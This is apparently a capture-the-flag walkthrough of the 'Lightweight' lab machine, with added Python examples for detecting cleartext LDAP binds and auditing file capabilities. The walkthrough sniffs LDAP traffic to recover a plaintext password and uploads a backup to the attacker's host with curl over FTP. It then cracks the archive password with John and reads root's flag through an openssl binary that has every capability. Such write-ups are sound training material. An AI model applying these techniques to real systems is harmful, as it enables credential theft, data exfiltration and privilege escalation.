We begin with a standard nmap scan:
root@orbital:~# nmap -A -T4 -oN lightweight_scan 10.10.10.119
And we can see it is running a few services:
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
The LDAP (Lightweight Directory Access Protocol) service will surely be useful at some point, but for now, if we have a look at the HTTP server, we’ll find the following in the user page:
This server lets you get in with ssh. Your IP is automatically added as userid and password within a minute of your first http page request. We strongly suggest you to change your password as soon as you get in the box.
For the initial probe I used the Linux Smart Enumeration script, which I prefer to other enumeration scripts: the ability to generate logs at different levels of detail is a great way to methodically dig into the machine. Since we have an account and SSH access from the very start, we can simply copy files around with scp.
LSE identified two other users which, given their names, are likely to interact with the LDAP service:
- ldapuser1
- ldapuser2
More interestingly, however, it highlights that we can sniff traffic with tcpdump. So let us listen:
ip@lightweight:~$ tcpdump -i 5 -vvv -XX
While tcpdump is listening, if we navigate to the “banned users” page we capture an interesting packet:
lightweight.htb.56908 > lightweight.htb.ldap: Flags [P.], cksum 0x2983 (incorrect -> 0xd5e5), seq 1:92, ack 1, win 683, options [nop,nop,TS val 232812292 ecr 232812292], length 91
    0x0000:  0000 0000 0000 0000 0000 0000 0800 4500  ..............E.
    0x0010:  008f 51f8 4000 4006 bf6f 0a0a 0a77 0a0a  ..Q.@.@..o...w..
    0x0020:  0a77 de4c 0185 a667 3ef3 08ce 5448 8018  .w.L...g>...TH..
    0x0030:  02ab 2983 0000 0101 080a 0de0 6f04 0de0  ..).........o...
    0x0040:  6f04 3059 0201 0160 5402 0103 042d 7569  o.0Y...`T....-ui
    0x0050:  643d 6c64 6170 7573 6572 322c 6f75 3d50  d=ldapuser2,ou=P
    0x0060:  656f 706c 652c 6463 3d6c 6967 6874 7765  eople,dc=lightwe
    0x0070:  6967 6874 2c64 633d 6874 6280 2038 6263  ight,dc=htb..8bc
    0x0080:  3832 3531 3333 3261 6265 3164 3766 3130  8251332abe1d7f10
    0x0090:  3564 3365 3533 6164 3339 6163 32         5d3e53ad39ac2
So we’re intercepting some LDAP traffic. LDAP supports different authentication methods, but since we can actually read this data, it looks like it is configured to use Simple Authentication. This type of authentication sends the DN and the password in plain text across the network.
DN: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
Password: 8bc8251332abe1d7f105d3e53ad39ac2
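To make the point about simple binds concrete, here is an added example (my own code, not part of the original writeup) that decodes the BER-encoded LDAP BindRequest from the 91 application bytes of the packet above and turns it into a detection finding. The detection function reports the DN and the fact that a non-empty password crossed the wire unencrypted, but deliberately leaves the secret itself out of the finding, which is how a monitoring rule for cleartext port-389 binds should behave. The SASL message it compares against is constructed here for contrast.

```python
"""Decode an LDAP BindRequest (RFC 4511) from a raw TCP payload and flag
cleartext simple binds.

Added example for this writeup, not part of the original post. It uses only
the standard library and a hand-written BER reader; real monitoring would
sit on a capture feed rather than on a constant."""

# Payload of the captured segment above: the 91 bytes that follow the 14-byte
# Ethernet, 20-byte IPv4 and 32-byte TCP headers (offset 0x42 in the dump).
CAPTURED_BIND = bytes.fromhex(
    "3059 0201 0160 5402 0103 042d 7569"
    "643d 6c64 6170 7573 6572 322c 6f75 3d50"
    "656f 706c 652c 6463 3d6c 6967 6874 7765"
    "6967 6874 2c64 633d 6874 6280 2038 6263"
    "3832 3531 3333 3261 6265 3164 3766 3130"
    "3564 3365 3533 6164 3339 6163 32"
)

# The same two values typed out, used to show that the encoding is reproducible.
DN = b"uid=ldapuser2,ou=People,dc=lightweight,dc=htb"
SECRET = b"8bc8251332abe1d7f105d3e53ad39ac2"


def _tlv(buf, pos):
    """Read one BER tag-length-value at pos. Returns (tag, value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("unsupported or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated value")
    return tag, buf[pos:pos + length], pos + length


def inspect_bind(payload):
    """Parse one LDAPMessage; return bind details, or None if it is not a BindRequest."""
    tag, msg, _ = _tlv(payload, 0)
    if tag != 0x30:                        # LDAPMessage ::= SEQUENCE
        raise ValueError("not an LDAPMessage")
    tag, mid, pos = _tlv(msg, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, body, _ = _tlv(msg, pos)
    if tag != 0x60:                        # [APPLICATION 0] BindRequest
        return None
    _, ver, pos = _tlv(body, 0)
    _, name, pos = _tlv(body, pos)
    auth_tag, cred, _ = _tlv(body, pos)    # [0] simple (0x80) or [3] sasl (0xA3)
    method = {0x80: "simple", 0xA3: "sasl"}.get(auth_tag, "unknown")
    return {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "dn": name.decode("utf-8", "replace"),
        "method": method,
        "secret_length": len(cred) if method == "simple" else 0,
    }


def cleartext_bind_finding(payload):
    """Detection rule: a simple bind with a non-empty password that we could parse
    off the wire is a cleartext credential. The secret is never copied into the
    finding; the DN and the fact are what an analyst needs."""
    try:
        info = inspect_bind(payload)
    except ValueError:
        return None                        # TLS, fragmented, or simply not LDAP
    if info is None or info["method"] != "simple" or info["secret_length"] == 0:
        return None
    return (f"LDAPv{info['version']} simple bind for '{info['dn']}' sent a "
            f"{info['secret_length']}-byte password in cleartext (messageID {info['message_id']})")


def _enc(tag, value):
    """Short-form BER encoder, enough to build messages under 128 bytes."""
    if len(value) >= 128:
        raise ValueError("short-form only")
    return bytes([tag, len(value)]) + value


def bind_request(message_id, dn, auth):
    """Build a BindRequest; `auth` is an already-tagged AuthenticationChoice."""
    body = _enc(0x02, b"\x03") + _enc(0x04, dn) + auth
    return _enc(0x30, _enc(0x02, bytes([message_id])) + _enc(0x60, body))


# A SASL bind (DIGEST-MD5 negotiation start), constructed for comparison: the rule stays silent.
SASL_BIND = bind_request(2, b"", _enc(0xA3, _enc(0x04, b"DIGEST-MD5")))

if __name__ == "__main__":
    print(cleartext_bind_finding(CAPTURED_BIND))
    print(cleartext_bind_finding(SASL_BIND))
```

Re-encoding the DN and password with `bind_request` reproduces the captured bytes exactly, which is a handy check that the offsets were read correctly from the dump. The fix on the server side is the usual one: require StartTLS or LDAPS before accepting a simple bind, after which the payload no longer parses at all and the rule cannot fire.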
We can’t SSH in as ldapuser2 directly, but if we connect with our initial user we can then su - ldapuser2 and use the password we have just recovered.
The user flag is present in this user’s home folder, as well as the following files:
- backup.7z
- OpenLDAP-Admin-Guide.pdf
- OpenLdap.pdf
netcat isn’t present on the target, but curl is, so we can do an FTP upload instead. On my host I installed pyftpdlib, which spins up a minimal FTP server rooted at a given folder with no additional setup:
root@orbital:~# pip install --user pyftpdlib
Then ran:
root@orbital:~# python -m pyftpdlib --directory=. --port=2121 --write
And on lightweight:
ldapuser2@lightweight:~$ curl -k -T backup.7z ftp://10.10.14.13:2121
The backup file is password protected and contains the PHP source for the website, which might well contain additional credentials. John the Ripper should be able to crack the archive password.
I had to install the jumbo-bleeding version of JTR, as the pre-installed JTR can’t deal with 7z files. With it installed, however, we can extract the hash with 7z2john.pl:
root@orbital:~# ./7z2john.pl backup.7z > backup.7z.hash
Then we run John against the hash, using the default password list:
root@orbital:~# john --wordlist=password.lst backup.7z.hash
John quickly shows us that the password for the file is delete. We can then extract the files, and we quickly find credentials for ldapuser1 in status.php:
$username = 'ldapuser1';
$password = 'f3ca9d298a553da117442deeb6fa932d';
We then switch to this user with su - ldapuser1.
Although none of the files have interesting permission bits set, some of them carry something else of interest: Linux file capabilities. We can list the capabilities of every file on the machine with:
ldapuser1@lightweight:~$ getcap -r / 2>/dev/null
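Reading getcap output by eye works on a small box, but a capability audit is worth automating, both for a pentest report and for a hardening baseline. The following is an added example of my own (not code from the writeup) that parses getcap lines and ranks them. It assumes the two output styles I know of: libcap before 2.41 prints "path = cap_x+ep", newer versions print "path cap_x=ep", and a bare "=ep" with no capability names means every capability is set. The sample lines are constructed; only the openssl path comes from this machine.

```python
"""Audit the output of `getcap -r /` for file capabilities that matter.

Added example, not part of the original writeup. It understands both getcap
output styles (libcap before 2.41 prints "path = cap_x+ep"; newer versions
print "path cap_x=ep") and the bare "=ep" form that means every capability."""

import re

# Capabilities that by themselves defeat normal access control. This is the
# reviewer's own triage list (an assumption), not an official ranking.
HIGH_RISK = {
    "cap_dac_read_search": "bypass read/search permission checks on any file",
    "cap_dac_override":    "bypass read, write and execute permission checks",
    "cap_setuid":          "switch to any UID, including 0",
    "cap_setgid":          "switch to any GID",
    "cap_sys_admin":       "catch-all admin capability (mounts, namespaces, ...)",
    "cap_sys_ptrace":      "trace and modify other users' processes",
    "cap_sys_module":      "load kernel modules",
    "cap_chown":           "change ownership of any file",
    "cap_fowner":          "bypass ownership checks on permission changes",
    "cap_setfcap":         "grant file capabilities to other binaries",
}
# Worth a note, but expected on some tools (ping, tcpdump).
WATCH = {
    "cap_net_raw":   "raw sockets: can capture traffic on any interface",
    "cap_net_admin": "reconfigure network interfaces and routing",
}

_LINE_RE = re.compile(
    r"^(?P<path>.+?)\s+(?:=\s+)?(?P<caps>(?:cap_[a-z_,]+)?[=+-][eip]*(?:\s+\S+)*)$")
_CLAUSE_RE = re.compile(
    r"^(?P<names>(?:cap_[a-z_]+(?:,cap_[a-z_]+)*)?)(?P<op>[=+-])(?P<flags>[eip]*)$")


def parse_getcap_line(line):
    """Return {'path', 'caps', 'all'} for one getcap line, or None if it is not one.

    'caps' holds the capabilities that end up effective or permitted; 'all' is
    True for the bare "=ep" form, where the name list is empty because every
    capability is set."""
    m = _LINE_RE.match(line.rstrip())
    if not m:
        return None
    active, everything = set(), False
    for clause in m.group("caps").split():
        c = _CLAUSE_RE.match(clause)
        if not c or c.group("op") == "-":
            continue
        if not (set(c.group("flags")) & {"e", "p"}):
            continue                      # inheritable-only or cleared: not directly usable
        names = c.group("names")
        if names:
            active.update(names.split(","))
        else:
            everything = True
    return {"path": m.group("path"), "caps": active, "all": everything}


def audit(lines):
    """Return (severity, path, capability, reason) tuples, HIGH findings first."""
    findings = []
    for line in lines:
        entry = parse_getcap_line(line)
        if entry is None:
            continue
        if entry["all"]:
            findings.append(("HIGH", entry["path"], "ALL",
                             "every capability effective and permitted: equivalent to root"))
            continue
        for cap in sorted(entry["caps"]):
            if cap in HIGH_RISK:
                findings.append(("HIGH", entry["path"], cap, HIGH_RISK[cap]))
            elif cap in WATCH:
                findings.append(("WATCH", entry["path"], cap, WATCH[cap]))
    findings.sort(key=lambda f: (f[0] != "HIGH", f[1]))
    return findings


# Constructed sample deliberately mixing both output styles plus a getcap error
# line; only the openssl entry corresponds to the box described above.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/usr/bin/newuidmap = cap_setuid+ep
/home/ldapuser1/openssl =ep
/usr/sbin/arping cap_net_raw=ep
/usr/bin/someservice = cap_net_bind_service+ep
Failed to get capabilities of file '/proc/1/exe' (No such file or directory)
"""

if __name__ == "__main__":
    for sev, path, cap, why in audit(SAMPLE_GETCAP.splitlines()):
        print(f"{sev:5} {path:28} {cap:20} {why}")
```

Feed it the real output with `getcap -r / 2>/dev/null | python3 capaudit.py` after swapping the sample for `sys.stdin`. The design choice worth noting is the flag check: a capability that is only inheritable (`+i`) is not flagged, since the process needs it in its permitted set to use it, whereas anything in `e` or `p` on a user-writable or user-owned binary, as with the openssl copy here, is a finding on its own.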
From this we find that the copy of openssl in /home/ldapuser1 has every capability enabled, which includes reading files from /root. Now, openssl isn’t exactly cat, but it can encode files in various formats and print them out. So we ask it to encode /root/root.txt in base64 and immediately decode the output afterwards:
ldapuser1@lightweight:~$ ./openssl base64 -in /root/root.txt | base64 -d
And the root flag is ours.